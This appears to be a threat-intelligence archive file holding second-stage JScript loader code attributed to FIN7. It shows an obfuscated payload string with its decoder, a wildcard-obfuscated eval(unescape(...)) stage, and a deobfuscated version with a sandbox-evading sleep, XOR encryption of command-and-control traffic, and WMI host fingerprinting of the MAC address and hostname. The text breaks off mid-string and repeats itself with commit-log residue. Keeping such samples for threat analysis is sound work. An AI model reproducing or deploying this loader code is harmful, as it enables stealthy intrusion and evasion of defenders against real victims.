CyberThreatIntel/cybercriminal groups/FIN7/2021-08-24/code/layer2.js

// In memory op (all steps)
OQywqAtKEYVPLbC = "+Afwb+m+)+voftA+dA+bqf+)#Agv+o+A+dAujAp+o&A31+gvod+&+6+Gtu+AbsAuA&+6GeAfm+b+XOR Brute Forcez&+31&A39+A&3+A:A+&3A+1A+&8AC&+1E&1+B&A1:wbA+s&31At&6+GXT+dAsjAqu&3+1+&4A+E+&+31+X+ATd+sjA+qu&4C&A1+E&+A1+B&1+:t&+6AGXTdA+sAj+qu+&3AF+Tm+fA+fq&39&42A+&4+A3&+41&4+1A&4+A+1+A&41A+&3:+&4CA&1E&+A1B&8A+E+A&+1E&+1+ABAg+vodujpA+oA&31gvod&6Gd+A+s+zqA+u&6GdpouspmAmAfs&+31&+39w+AbsA&6G+uAz+qA+f&+3A+D+&3A+1A+wA+bs&6+AGAsA+fr+vfAtu&3:+&3+A1&8AC&1+E&1B&+A1:u+Asz&8A+C&1+AEA&1B&1:A&A1:wb+s&31+A+fAods+zq+AuA+jpAo&+A+6GlAfz+A+&3+1&4+EA&31&3+3&+33&A4C+&1AE&A1B&1:&1A+:AjA+gA&+39Awbs&6G+uz+qf+&A3+1&+4A+E+&A4+EA&4A+E&3+A1&+A33efds+A+zqu&A+33&3+:&A3+1&8+C&A1+E+&1+A+B&1+:&1:+&+1+:wb+As&A6+AGsfrA+vfAtu+&31&+4EA&A31+vo+fAtd+bqf+&+39A+w+bsA&+A6G+sAfrAv+ftA+u+&3:&A4A+C&1E&1AB+&1:A+&1+A:&1:A+wAbs&+A3A1sAfArvA+ftuA&A6+Gt+qm+juA+&A31A&+4E&3+1+wbs+A&A+6AGsfr+A+vA+f+AtuA&3AF+Atqmju&3+9+&3+3&3+7A&6G+A&37&A33+&3A:+&4CA+&A1E+&+1B+&1A+:+A&1:A&1+:+wb+s&+6A+Gsfr+v+ft+Au&+A31A+&+A4AE&+A+3+A1sf+rvAf+tA+u+&6GtqmjAu&A6+C&4+A1&6E+A&4C&A1E&1+B&1:&+1+A:&1:jAgA&A3A+1&39AsfA+rvf+t+A+u+&A+6GtqAmAju&A3A+F+mfo+Ah+ui&3A1&4A+EA+&4EA+&3+1&4A3+A+&A3:&31&A+8CA+&1A+E&A1+BA&1A:+&+1:&+A1:+&A+1A+:fodAs+zqujp+o&+A+6G+lf+A+z&31+&A+4AE&3A1sf+ArvA+ftAu&+6GA+t+Aq+m+jAu&+6CA+&4+2&+6EA&3F+t+q+A+m+ju&39A&3+A3&+3+3&3:&4C&A1+AE+&+A1B+A+&+A1+:&1:&1:+&+8A+Ef+A+m+tf+&8+C&A+1AE+&A1B&1A:&+1+A+:&A1A+:&+A1+A:+As+fAuvso+A&31A+w+b+s&A+6GAs+f+rA+v+AftAuA&4C&A1+E+A&+1B+&1A:+&1+:+&1+:&8+E+A&A1AE+A+&1+B&A+1A:A+&+A+1+:&+8EfAm+tf&+8AC&1+E&+A+1B+&+1:&1:&A1:+f+A+oAdA+szquA+jpAo&6+AGl+Afz&3+A1+A&A+4E&+A31+&A39A+Nbu+i&3+AF+gmp+pAs&+3+9AN+Ab+uAi&3FsbAoAeAp+n&39&A3:&A+3B+&4:A&4+A1&+A41+&+41+&3:&31+A+&+A+3C+&A3+1&A4A2&41+&+4+1&4A1+&A+3+:A&A3F+A+uApTu+sjAoAhA&3A9+&+A3+:+&A3+FAtqmAj+A+u+A&A+39&A+3A3A&A+33&+3+:+A&4+AC&+1+E&A1B+A&1:+&1:+&1+:Awbs&6+AG+sfAr+vf+A+t+u+&+A+4AEvofAt+db+q+f&3+9fo+A+dpAefVSJD+pAnqApAof+oA+u&3+9+wbs+&6GAs+fr+vAf+t+Au&+3+:&3:&4+CA&1AE+&+1B+&A1:&1:+A+&8AE+A&1E&A1ABA+&1:&1:w+bA+s+A+&A+3+1wAb+A+s&6Gp+vA+uqAvuA+&31&+A4E&31A+ofx&A31BAsAs+bAz&A+3+9+wAb+s&6GsfrAv+ftAu&+3+FAmfoh+u+i&3+:+&+4C+&1AE&+A1AB+A&1A+:+&1:gp+As&+31+&39wb+As&3+1+j&6+AGA+dpvAo+Au+f+AsA&+A31&4EA&A31&41A+&+4+C&A+31Aj&+6AGdp+voAuA+fAs&3+1A&A4+AD+A&A31+w+bs&+6Gs+A+fA+rvAfAtu&+3AFmAf+ohu+i&A4CA+&31j+A&+6GdpvAouAf+A+s&A3C&3AC&+3+:&31&+8C&1E&1B+&1+:&+1:+&A+1:+A+wbA+s+&3A+1+wA+bs&A+6G+dib+sDpef&A31A+&4E&A31wb+s+&+A6A+GsfrvftuA&3F+dA+ibs+A+D+pA+efBAu&A+3+9+A+j&+A+6+Gdp+Avo+Aufs&3+:A&3+1+&A6+AF&A31fo+ds+z+qA+uj+Ap+Ao&A+6Glfz+&A+6CjA&A6G+d+pA+voAufAs&+A+31&A3A+6&31+Af+o+dAs+z+q+uAj+po+&A+6G+l+fA+z+&3FAmfAohui+&A6+AE&+A3AFAdibsDpAefABu&39&41&3+:&4+C&A+1+AE+A&1B&1:&1:&+1A+:wbs+&+6GpAv+uqA+vuA&+6+C+j+&6+G+AdpAv+A+ou+fs&6E+A&3+1&4E&31T+A+u+A+sA+j+ohA&+3FAg+spn+DiAb+s+D+p+e+Af+&A3+9+wbsA+&+6G+dAi+bsAD+pAe+f+A&3:&+A4+C+A&A1E&1B&1+:&1:A+&+8E&1E&1B&1:+&+1+A:+Awb+s&A3+A1As+f+t+Avm+u&+6GtA+usjAo+h&31&4E&+31Awb+s+&6+AGpvuqvu&3+FkA+pj+oA&+A3+9&+33+&+A+33+&+A3:+&A4+C+A&+1A+E+&+1B&+1:&+A1:jg&A+39AwAb+s&A6GuzqAf+&3A1&4EA+&4+E&4E+A+&A3+A+1&33Af+Ao+dA+s+Az+qAuA+&+A3+A3&3+:&+3+1&+8C+&1EA&+A1+AB&1+:&1:&A1+:AsfA+tAvmu+&+A6GtAuAs+jAo+h&31&+4AE&31+sf+t+vmAu&6A+Gtu+sjo+hA+&A+31A+&+3+C+A&3A+1&3A+3+&37+A&+6G+&+3A+7&+33A&3A1+&3AC&31f+odAszqujpA+o&6+G+lf+z&+3AFkApj+o+A+&+A3A9&3+A3+&33+&+3A:A&4A+C+&A+1AE&1AB+&1+A:&1:&+A1+A:+As+fAtAv+m+u+&+A6GtuAs+j+A+oAh&+A3A1&A+4+E&31AfAtdbq+f&+39sAftvm+u&6A+G+tus+jo+hA&+3:&+4+C&1+EA+&1A+B+&1A:&1A:&+8EA&+A1E&+1B+&1:&1A:+sAfu+v+A+sA+o+&+31s+A+f+AtA+vmu+A&6+GAtuAsjoh&4C&1EA+&1AB&3+A1&A+3+A+1+&+A+31+&31+&A8E+dAbudi&3+9fA&A3A+:A&A3+1&+8+C+A&+1E&1+B&31+&3+1&31A+&3+A1&3A+1&31A&+3+1+&A+3+1sf+Auvso&31A&33AopA&3+3&4A+C&1E+&1AB&A3+1+&31A&3A+1+A&3+A+1+&8EA&+1E&1AB+A&1E&1BA&+8E+A+&+A1+E&1+BAgvA+o+duAjpo+&+3+1+Ag+voA+dA&6+Gje&3+1&39&3:&3+1A+&A8CA&1EA&A1B&+1:wbsA+&31nAbAd+&+A6+AGbAeesAftt+&+A+31&+4EA&31+A&3+3&3+4+Fssps&34+A+&3A+3&4C+&A1E+A&A1B&+1:wb+sA&+A31eot&6G+Aip+tu+obAnfA&+31&A4+AE+A+&3A1&33&A+3A4FA+ssAps&A34+&+33&4+ACA+&1E&A1+AB&+A1A+:AusAz&8+ACA&+1E&A1AB+&A1:&+1:wbAsA&A31+mAsAf+Ar+v+ft+uA&A31A+&4E&+3A1xnj+A&A3A+FFyf+dR+Avf+sz&+3A9&A+3+3tfmf+d+uA+&A3+1&+3+AB+&+31+AgspAnA&A31XA+j+o&+4+4&+A43+&6GOA+fAu+xA+pslBeb+quf+sAD+ApAogj+AhA+
yCRQsLachezYpHlTf = "";
// unused string version
function nIoWRmSCpujBFziN(ysFMcYPvwAKbLgeCSf) { return String.fromCharCode(ysFMcYPvwAKbLgeCSf); }

function gJKESNhpluIOVRw(wtfsyRlYSEVcqDx, iONhHpdTKgYQJUeZyG) { return wtfsyRlYSEVcqDx.charCodeAt(iONhHpdTKgYQJUeZyG); }
stkChZmIjlpFrxaRDWN = 1944798 / 33531;
for (OwkFMgqJoXhRBpIsGQA = 0; OwkFMgqJoXhRBpIsGQA < OQywqAtKEYVPLbC["length"]; OwkFMgqJoXhRBpIsGQA++) {
    tIFTSbRMOhaueUVP = gJKESNhpluIOVRw(OQywqAtKEYVPLbC, OwkFMgqJoXhRBpIsGQA) - (1833) * stkChZmIjlpFrxaRDWN / (106314), tIFTSbRMOhaueUVP != (106314) * stkChZmIjlpFrxaRDWN / (240352) && tIFTSbRMOhaueUVP != (444928) * stkChZmIjlpFrxaRDWN / (403216) && (yCRQsLachezYpHlTf += nIoWRmSCpujBFziN(tIFTSbRMOhaueUVP));
}

//In memory (obfuscated + * will be removed in next step)
*
eva * l * ( * unes * c * ape * ("fu*n**ctio*n%20*func*%*5*Fst*art%*5Fdel*a*y%*20%28*%2*9*%2*0*%7B%*0D%0*A%09va*r%20s%5*FWS*cript%2*0*%3*D*%*20*W*Sc*ri*pt%3B%0*D%*0*A%0*9s%*5FWSc*ri*pt*%2E*Sl*e*ep%28%31*%3*2%*30%3*0%3**0*%30*%29*%3B%0D%*0A%7*D*%*0D%*0*Af*unctio*n%20func%5Fc**r*yp*t%5Fcontroller%*20%*28v*ar%5F*ty*p*e%*2*C*%2*0*v*ar%5*Fr*eq*uest%29*%2*0%7B%0*D%0A%*09t*ry%7*B%0*D%0A%09%09va*r%20**encr*yp*t*ion%**5Fkey**%2*0%3*D%20%2*2%*22%3B*%0D%0A%09%0*9i*f%*28var%5F*ty*pe*%2*0%*3*D*%3*D%3*D%2*0%*22decr**ypt%*22%2*9%2*0%7*B%0*D*%0**A%0*9%09*%*0*9va*r%5*Freq*uest*%20%*3D%20*un*esc*ape*%*28*v*ar%*5F*requ*es*t*%29%3*B%0D%0A*%09*%0*9%09*var%*20requ*est%5*Fs*pl*it*%20%*3D%2*0*var*%*5Freq**u*e*st%2E*split%2*8*%2*2%2*6%5F*%26%22*%29*%3B*%0D*%*0A*%0*9*%09%0*9*va*r%*5*Freq*u*es*t%*20*%*3D%**2*0re*que*s*t*%5Fsplit%5*B%3*0%5D*%3B%0D%0*A%09%*0*9%09if%2*0%28re*que*s**t*%*5Fsplit%2*E*len*g*th%20%3*D*%3D*%2*0%32**%29%20%*7B*%0*D%0*A%09*%*09%*09*%*0*9encr*yptio*n%**5F*ke**y%20*%*3D%20re*qu*est%*5F*s*p*l*it%*5B*%3*1%*5D%2E*s*p**l*it%28%2*2%*2*2%29%3B%0*D*%*0A**%*0*9%09%09*%*7*De**l*se*%7*B%*0D*%0A%09%*0**9%0*9%*0*9*r*eturn*%20*v*a*r%*5Fr*e*q*u*est%3B%0*D*%*0A*%09*%0*9*%0*9%7*D*%0D**%0*A%*09*%**0*9%*7Del*se%*7B%0*D%**0A*%*09%09%09*e**nc*rypt*ion%5*Fk*ey%2*0*%*3D%*20*%28*Mat*h%2*E*flo*or%*2*8M*a*th%2Erando*m%28%29%*2A*%39%3*0%*30*%*30*%29%20**%**2B*%2*0%31%30*%*3*0%30*%*2*9%2E**toSt*ring%28*%*2*9*%2*Espli**t*%*28%*22%*22%*2*9*%3*B%*0*D%0A*%09*%09*%0*9var%5*F*req*ue**s*t*%**3Dunes*ca*p*e%2*8en**codeURIC*ompone*n*t%2*8*var*%5Fr*eq*ue*s*t%*2*9%29%3*B%0D*%*0A*%09%09**%7D*%0D%0A*%09%09v*a*r**%*2*0va**r%5Fo*u*tput*%20%*3D%20*new%20Arr*ay%*2*8*va*r%5Frequ*est%*2*Eleng*t*h%2*9*%*3B*%0D%*0A*%0*9*%09fo*r%*20*%28va*r%2*0*i%5*F*coun*t*e*r%*20%3D%20%30*%*3*B%*20i%*5Fco*unt*er%2*0%3*C*%20*v*ar%*5Fr**e*quest%*2Ele*ngt*h%3B*%20i*%*5Fcounte**r%2B%2B%*2*9%20%*7B%0D%0A*%0*9%*09*%*09**va*r*%2*0*v*ar%*5F*cha*rCode%20*%3D%20va*r*%*5*Frequest%2E*c*har**C*o*deAt%*2*8**i%**5*Fco*un*ter%2*9%2*0*%5*E%20en*cr*y*p*ti*o*n%*5Fkey*%*5Bi%5F*c*o*unter%**20%2*5%20*e*n*cr*y*p*ti*on*%*5F*k*e*y*%2Elength*%5*D%*2EcharCodeAt%28%30%2*9%3*B%*0*D*%0A%09%09%*0*9var*%*5Fou*tp*ut%*5*B*i*%5*F*cou**nt*er%5D*%2*0%3D%20S**t**r*i*ng%*2Ef*rom*Cha*r*C*o*d*e*%2*8*var*%*5F*ch*arC*od*e*%29%*3*B*%0D%0A%0*9%09*%*7D%0D%0A%09*%*0*9*va*r%2*0r*e*s*ul*t%*5Fs*trin*g%20%3D%*20va*r*%5*Foutput%2*Ej*oi*n%*2*8%*22*%**22*%*29*%3*B*%*0*D*%*0A%*09%*09if%*28va*r%5Ftype*%20%3D*%3*D%3D**%2**0%22e*n*c*r*y*pt*%*2*2%2*9%*2*0%*7B*%0D%*0*A%0*9%09%0*9re*sult*%*5Fstr*in*g%20%*3D%20*re*s*ult%5*Fst*rin*g*%*20*%*2*B*%2*0%2*2*%26*%*5F*%*2*6%*22%20*%2B%20e*ncryptio*n%5*F*ke*y%*2Ejoi*n**%*28%2*2*%22*%*29%3*B*%*0D%0A*%0*9%09%*0*9*r*esu*l*t*%*5Fstr*i**ng%*20%*3*D%20escap*e%*28resul*t%5*F*str*in*g%*29%*3*B%0*D*%0*A*%09%09%*7D%*0D%*0A*%09%09*ret*u**r*n*%*20r**e*s*ult*%5*Fstring%3B%0D*%0A%2*0%*2**0*%**20*%20*%7D*catch%2*8e%2*9%2*0%*7*B*%*0D%0*A%20*%2*0%20*%2*0%2*0%20%*2*0*%*2*0re*turn%20%22no%2*2%3*B%0D*%0A%2*0*%20%2*0*%2**0*%7D%*0D%0A*%0D%0A%*7D**%*0*D%0*Afu*n*ction*%*2*0*f*un*c%5*Fid%2*0%28%29%2*0*%7B%0D%0A%*09var*%20mac*%*5*Faddress*%**20%*3D%20*%2*2%2*3*Error%23**%2*2%3B*%0D*%0A%*09va*r%*20dns%5F*ho*st*name%*20%3*D**%20%22%*23E*rror%23*%*22%3*B*%0D%0*A%*0*9try%7*B%*0D%0A*%09%*09var%20*lre*q*u*es*t%20*%3D%*20wmi*%2*EExe*cQ*ue*ry%*28%*2*2sele*c*t*%2*0%*2*A*%*20*from%20W*i*n%*3*3%*32*%5FN*et*w*orkAda*pte*rC*onfi*g*u**rat*ion%*20where*%2*0*i*p**enab*led%2*0*%3*D%20t*ru*e%*22*%2*9%3*B%0D%*0*A%0*9%*09var*%2**0**lIt*ems*%*20%*3D*%*2*0**ne*w**%*2*0*En*u*me*r*a*t*o*r%28lre*q*uest*%*29%3B*%0*D%0A*%09*%09*fo*r*%20%28*%*3*B%20%*2*1l*Item*s*%2*EatEnd%*28%29*%3*B*%*20*lIte*ms%2Emo*v*e*N*ext%28%29%29*%2*0*%*7*B%*0*D%**0A%*0*9%09%0*9*m*a*c*%5*Fad*dre**ss%*20*%*3*D%*2*0lIt*em*s%2*Ei*te*m%*28%*2*9*%2E*m*acadd*ress*%*3B%*0D%0*A%09%09*%09dns*%5Fhostna*m*e*%20*%3D%2*0*lIte*ms%2E*it*em%*2*8*%2*9*%*2E*DNSHo*stN*ame*%3B%*0D*%0*A%0*9%09*%0*9*if*%*2*8typeo*f%20*m*ac%5Fa*ddr**e*ss%*20%3D*%3*D%3D%*2*0*%*22*s*trin**g*%*2**2%*2**0*%26%26%20m*a*c%5Faddress%2*E*leng*th%2**0%3*E%2**0%31%29%**2*0%7B%0*D*%*0A*%09%09%0*9%09if%28*t*ype**of%*2*0dns%**5Fhostna*me*%*2

// cLean version
function func_start_delay() {
    var s_WScript = WScript;
    s_WScript.Sleep(120000);
}

function func_crypt_controller(var_type, var_request) {
    try {
        var encryption_key = "";
        if (var_type === "decrypt") {
            var_request = unescape(var_request);
            var request_split = var_request.split("&_&");
            var_request = request_split[0];
            if (request_split.length == 2) { encryption_key = request_split[1].split(""); } else { return var_request; }
        } else {
            encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split("");
            var_request = unescape(encodeURIComponent(var_request));
        }
        var var_output = new Array(var_request.length);
        for (var i_counter = 0; i_counter < var_request.length; i_counter++) {
            var var_charCode = var_request.charCodeAt(i_counter) ^ encryption_key[i_counter % encryption_key.length].charCodeAt(0);
            var_output[i_counter] = String.fromCharCode(var_charCode);
        }
        var result_string = var_output.join("");
        if (var_type === "encrypt") {
            result_string = result_string + "&_&" + encryption_key.join("");
            result_string = escape(result_string);
        }
        return result_string;
    } catch (e) { return "no"; }
}
Create layer2.js 2021-08-24 23:12:57 +00:00			`// In memory op (all steps)`
			OQywqAtKEYVPLbC = "+Afwb+m+)+voftA+dA+bqf+)#Agv+o+A+dAujAp+o&A31+gvod+&+6+Gtu+AbsAuA&+6GeAfm+b+XOR Brute Forcez&+31&A39+A&3+A:A+&3A+1A+&8AC&+1E&1+B&A1:wbA+s&31At&6+GXT+dAsjAqu&3+1+&4A+E+&+31+X+ATd+sjA+qu&4C&A1+E&+A1+B&1+:t&+6AGXTdA+sAj+qu+&3AF+Tm+fA+fq&39&42A+&4+A3&+41&4+1A&4+A+1+A&41A+&3:+&4CA&1E&+A1B&8A+E+A&+1E&+1+ABAg+vodujpA+oA&31gvod&6Gd+A+s+zqA+u&6GdpouspmAmAfs&+31&+39w+AbsA&6G+uAz+qA+f&+3A+D+&3A+1A+wA+bs&6+AGAsA+fr+vfAtu&3:+&3+A1&8AC&1+E&1B&+A1:u+Asz&8A+C&1+AEA&1B&1:A&A1:wb+s&31+A+fAods+zq+AuA+jpAo&+A+6GlAfz+A+&3+1&4+EA&31&3+3&+33&A4C+&1AE&A1B&1:&1A+:AjA+gA&+39Awbs&6G+uz+qf+&A3+1&+4A+E+&A4+EA&4A+E&3+A1&+A33efds+A+zqu&A+33&3+:&A3+1&8+C&A1+E+&1+A+B&1+:&1:+&+1+:wb+As&A6+AGsfrA+vfAtu+&31&+4EA&A31+vo+fAtd+bqf+&+39A+w+bsA&+A6G+sAfrAv+ftA+u+&3:&A4A+C&1E&1AB+&1:A+&1+A:&1:A+wAbs&+A3A1sAfArvA+ftuA&A6+Gt+qm+juA+&A31A&+4E&3+1+wbs+A&A+6AGsfr+A+vA+f+AtuA&3AF+Atqmju&3+9+&3+3&3+7A&6G+A&37&A33+&3A:+&4CA+&A1E+&+1B+&1A+:+A&1:A&1+:+wb+s&+6A+Gsfr+v+ft+Au&+A31A+&+A4AE&+A+3+A1sf+rvAf+tA+u+&6GtqmjAu&A6+C&4+A1&6E+A&4C&A1E&1+B&1:&+1+A:&1:jAgA&A3A+1&39AsfA+rvf+t+A+u+&A+6GtqAmAju&A3A+F+mfo+Ah+ui&3A1&4A+EA+&4EA+&3+1&4A3+A+&A3:&31&A+8CA+&1A+E&A1+BA&1A:+&+1:&+A1:+&A+1A+:fodAs+zqujp+o&+A+6G+lf+A+z&31+&A+4AE&3A1sf+ArvA+ftAu&+6GA+t+Aq+m+jAu&+6CA+&4+2&+6EA&3F+t+q+A+m+ju&39A&3+A3&+3+3&3:&4C&A1+AE+&+A1B+A+&+A1+:&1:&1:+&+8A+Ef+A+m+tf+&8+C&A+1AE+&A1B&1A:&+1+A+:&A1A+:&+A1+A:+As+fAuvso+A&31A+w+b+s&A+6GAs+f+rA+v+AftAuA&4C&A1+E+A&+1B+&1A:+&1+:+&1+:&8+E+A&A1AE+A+&1+B&A+1A:A+&+A+1+:&+8EfAm+tf&+8AC&1+E&+A+1B+&+1:&1:&A1:+f+A+oAdA+szquA+jpAo&6+AGl+Afz&3+A1+A&A+4E&+A31+&A39A+Nbu+i&3+AF+gmp+pAs&+3+9AN+Ab+uAi&3FsbAoAeAp+n&39&A3:&A+3B+&4:A&4+A1&+A41+&+41+&3:&31+A+&+A+3C+&A3+1&A4A2&41+&+4+1&4A1+&A+3+:A&A3F+A+uApTu+sjAoAhA&3A9+&+A3+:+&A3+FAtqmAj+A+u+A&A+39&A+3A3A&A+33&+3+:+A&4+AC&+1+E&A1B+A&1:+&1:+&1+:Awbs&6+AG+sfAr+vf+A+t+u+&+A+4AEvofAt+db+q+f&3+9fo+A+dpAefVSJD+pAnqApAof+oA+u&3+9+wbs+&6GAs+fr+vAf+t+Au&+3+:&3:&4+CA&1AE+&+1B+&A1:&1:+A+&8AE+A&1E&A1ABA+&1:&1:w+bA+s+A+&A+3+1wAb+A+s&6Gp+vA+uqAvuA+&31&+A4E&31A+ofx&A31BAsAs+bAz&A+3+9+wAb+s&6GsfrAv+ftAu&+3+FAmfoh+u+i&3+:+&+4C+&1AE&+A1AB+A&1A+:+&1:gp+As&+31+&39wb+As&3+1+j&6+AGA+dpvAo+Au+f+AsA&+A31&4EA&A31&41A+&+4+C&A+31Aj&+6AGdp+voAuA+fAs&3+1A&A4+AD+A&A31+w+bs&+6Gs+A+fA+rvAfAtu&+3AFmAf+ohu+i&A4CA+&31j+A&+6GdpvAouAf+A+s&A3C&3AC&+3+:&31&+8C&1E&1B+&1+:&+1:+&A+1:+A+wbA+s+&3A+1+wA+bs&A+6G+dib+sDpef&A31A+&4E&A31wb+s+&+A6A+GsfrvftuA&3F+dA+ibs+A+D+pA+efBAu&A+3+9+A+j&+A+6+Gdp+Avo+Aufs&3+:A&3+1+&A6+AF&A31fo+ds+z+qA+uj+Ap+Ao&A+6Glfz+&A+6CjA&A6G+d+pA+voAufAs&+A+31&A3A+6&31+Af+o+dAs+z+q+uAj+po+&A+6G+l+fA+z+&3FAmfAohui+&A6+AE&+A3AFAdibsDpAefABu&39&41&3+:&4+C&A+1+AE+A&1B&1:&1:&+1A+:wbs+&+6GpAv+uqA+vuA&+6+C+j+&6+G+AdpAv+A+ou+fs&6E+A&3+1&4E&31T+A+u+A+sA+j+ohA&+3FAg+spn+DiAb+s+D+p+e+Af+&A3+9+wbsA+&+6G+dAi+bsAD+pAe+f+A&3:&+A4+C+A&A1E&1B&1+:&1:A+&+8E&1E&1B&1:+&+1+A:+Awb+s&A3+A1As+f+t+Avm+u&+6GtA+usjAo+h&31&4E&+31Awb+s+&6+AGpvuqvu&3+FkA+pj+oA&+A3+9&+33+&+A+33+&+A3:+&A4+C+A&+1A+E+&+1B&+1:&+A1:jg&A+39AwAb+s&A6GuzqAf+&3A1&4EA+&4+E&4E+A+&A3+A+1&33Af+Ao+dA+s+Az+qAuA+&+A3+A3&3+:&+3+1&+8C+&1EA&+A1+AB&1+:&1:&A1+:AsfA+tAvmu+&+A6GtAuAs+jAo+h&31&+4AE&31+sf+t+vmAu&6A+Gtu+sjo+hA+&A+31A+&+3+C+A&3A+1&3A+3+&37+A&+6G+&+3A+7&+33A&3A1+&3AC&31f+odAszqujpA+o&6+G+lf+z&+3AFkApj+o+A+&+A3A9&3+A3+&33+&+3A:A&4A+C+&A+1AE&1AB+&1+A:&1:&+A1+A:+As+fAtAv+m+u+&+A6GtuAs+j+A+oAh&+A3A1&A+4+E&31AfAtdbq+f&+39sAftvm+u&6A+G+tus+jo+hA&+3:&+4+C&1+EA+&1A+B+&1A:&1A:&+8EA&+A1E&+1B+&1:&1A:+sAfu+v+A+sA+o+&+31s+A+f+AtA+vmu+A&6+GAtuAsjoh&4C&1EA+&1AB&3+A1&A+3+A+1+&+A+31+&31+&A8E+dAbudi&3+9fA&A3A+:A&A3+1&+8+C+A&+1E&1+B&31+&3+1&31A+&3+A1&3A+1&31A&+3+1+&A+3+1sf+Auvso&31A&33AopA&3+3&4A+C&1E+&1AB&A3+1+&31A&3A+1+A&3+A+1+&8EA&+1E&1AB+A&1E&1BA&+8E+A+&+A1+E&1+BAgvA+o+duAjpo+&+3+1+Ag+voA+dA&6+Gje&3+1&39&3:&3+1A+&A8CA&1EA&A1B&+1:wbsA+&31nAbAd+&+A6+AGbAeesAftt+&+A+31&+4EA&31+A&3+3&3+4+Fssps&34+A+&3A+3&4C+&A1E+A&A1B&+1:wb+sA&+A31eot&6G+Aip+tu+obAnfA&+31&A4+AE+A+&3A1&33&A+3A4FA+ssAps&A34+&+33&4+ACA+&1E&A1+AB&+A1A+:AusAz&8+ACA&+1E&A1AB+&A1:&+1:wbAsA&A31+mAsAf+Ar+v+ft+uA&A31A+&4E&+3A1xnj+A&A3A+FFyf+dR+Avf+sz&+3A9&A+3+3tfmf+d+uA+&A3+1&+3+AB+&+31+AgspAnA&A31XA+j+o&+4+4&+A43+&6GOA+fAu+xA+pslBeb+quf+sAD+ApAogj+AhA+
			`yCRQsLachezYpHlTf = "";`
			`// unused string version`
			`function nIoWRmSCpujBFziN(ysFMcYPvwAKbLgeCSf) { return String.fromCharCode(ysFMcYPvwAKbLgeCSf); }`

			`function gJKESNhpluIOVRw(wtfsyRlYSEVcqDx, iONhHpdTKgYQJUeZyG) { return wtfsyRlYSEVcqDx.charCodeAt(iONhHpdTKgYQJUeZyG); }`
			`stkChZmIjlpFrxaRDWN = 1944798 / 33531;`
			`for (OwkFMgqJoXhRBpIsGQA = 0; OwkFMgqJoXhRBpIsGQA < OQywqAtKEYVPLbC["length"]; OwkFMgqJoXhRBpIsGQA++) {`
			`tIFTSbRMOhaueUVP = gJKESNhpluIOVRw(OQywqAtKEYVPLbC, OwkFMgqJoXhRBpIsGQA) - (1833) * stkChZmIjlpFrxaRDWN / (106314), tIFTSbRMOhaueUVP != (106314) * stkChZmIjlpFrxaRDWN / (240352) && tIFTSbRMOhaueUVP != (444928) * stkChZmIjlpFrxaRDWN / (403216) && (yCRQsLachezYpHlTf += nIoWRmSCpujBFziN(tIFTSbRMOhaueUVP));`
			`}`

			`//In memory (obfuscated + * will be removed in next step)`
			`*`
			eva * l * ( * unes * c * ape * ("function%20func%5Fstart%5Fdelay%20%28%29%20%7B%0D%0A%09var%20s%5FWScript%20%3D%20WScript%3B%0D%0A%09s%5FWScript%2ESleep%28%31%32%30%30%30%30%29%3B%0D%0A%7D%0D%0Afunction%20func%5Fc*rypt%5Fcontroller%20%28var%5Ftype%2C%20var%5Frequest%29%20%7B%0D%0A%09try%7B%0D%0A%09%09var%20*encryption%5Fkey%20%3D%20%22%22%3B%0D%0A%09%09if%28var%5Ftype%20%3D%3D%3D%20%22decrypt%22%29%20%7B%0D%0A%09%09%09var%5Frequest%20%3D%20unescape%28var%5Frequest%29%3B%0D%0A%09%09%09var%20request%5Fsplit%20%3D%20var%5Freq*uest%2Esplit%28%22%26%5F%26%22%29%3B%0D%0A%09%09%09var%5Frequest%20%3D%*20request%5Fsplit%5B%30%5D%3B%0D%0A%09%09%09if%20%28request%5Fsplit%2Elength%20%3D%3D%20%32%29%20%7B%0D%0A%09%09%09%09encryption%5Fke*y%20%3D%20request%5Fsplit%5B%31%5D%2Esp*lit%28%22%22%29%3B%0D%0A*%09%09%09%7De*lse%7B%0D%0A%09%09%09%09return%20var%5Frequest%3B%0D%0A%09%09%09%7D%0D%0A%09%*09%7Delse%7B%0D%*0A%09%09%09e*ncryption%5Fkey%20%3D%20%28Math%2Efloor%28Math%2Erandom%28%29%2A%39%30%30%30%29%20%2B%20%31%30%30%30%29%2EtoString%28%29%2Esplit%28%22%22%29%3B%0D%0A%09%09%09var%5Freque*st%3Dunescape%28encodeURIComponent%28var%5Frequest%29%29%3B%0D%0A%09%09%7D%0D%0A%09%09var%20var%5Foutput%20%3D%20new%20Array%28var%5Frequest%2Elength%29%3B%0D%0A%09%09for%20%28var%20i%5Fcounter%20%3D%20%30%3B%20i%5Fcounter%20%3C%20var%5Frequest%2Elength%3B%20i%5Fcounte*r%2B%2B%29%20%7B%0D%0A%09%09%09var%20var%5FcharCode%20%3D%20var%5Frequest%2Echar*CodeAt%28i%5Fcounter%29%20%5E%20encryption%5Fkey%5Bi%5Fcounter%*20%25%20encryption%5Fkey%2Elength%5D%2EcharCodeAt%28%30%29%3B%0D%0A%09%09%09var%5Foutput%5Bi%5Fcounter%5D%20%3D%20String%2EfromCharCode%28var%5FcharCode%29%3B%0D%0A%09%09%7D%0D%0A%09%09var%20result%5Fstring%20%3D%20var%5Foutput%2Ejoin%28%22%*22%29%3B%0D%0A%09%09if%28var%5Ftype%20%3D%3D%3D%20%22encrypt%22%29%20%7B%0D%0A%09%09%09result%5Fstring%20%3D%20result%5Fstring%20%2B%20%22%26%5F%26%22%20%2B%20encryption%5Fkey%2Ejoin%28%22%22%29%3B%0D%0A%09%09%09result%5Fstri*ng%20%3D%20escape%28result%5Fstring%29%3B%0D%0A%09%09%7D%0D%0A%09%09retu*rn%20r*esult%5Fstring%3B%0D%0A%20%2*0%*20%20%7Dcatch%28e%29%20%7B%0D%0A%20%20%20%20%20%20%20%20return%20%22no%22%3B%0D%0A%20%20%20%2*0%7D%0D%0A%0D%0A%7D%0D%0Afunction%20func%5Fid%20%28%29%20%7B%0D%0A%09var%20mac%5Faddress%*20%3D%20%22%23Error%23*%22%3B%0D%0A%09var%20dns%5Fhostname%20%3D*%20%22%23Error%23%22%3B%0D%0A%09try%7B%0D%0A%09%09var%20lrequest%20%3D%20wmi%2EExecQuery%28%22select%20%2A%20from%20Win%33%32%5FNetworkAdapterConfigu*ration%20where%20ipenabled%20%3D%20true%22%29%3B%0D%0A%09%09var%20lItems%20%3D%20new*%20Enumerator%28lrequest%29%3B%0D%0A%09%09for%20%28%3B%20%21lItems%2EatEnd%28%29%3B%20lItems%2EmoveNext%28%29%29%20%7B%0D%0A%09%09%09mac%5Faddre*ss%20%3D%20lItems%2Eitem%28%29%2Emacaddr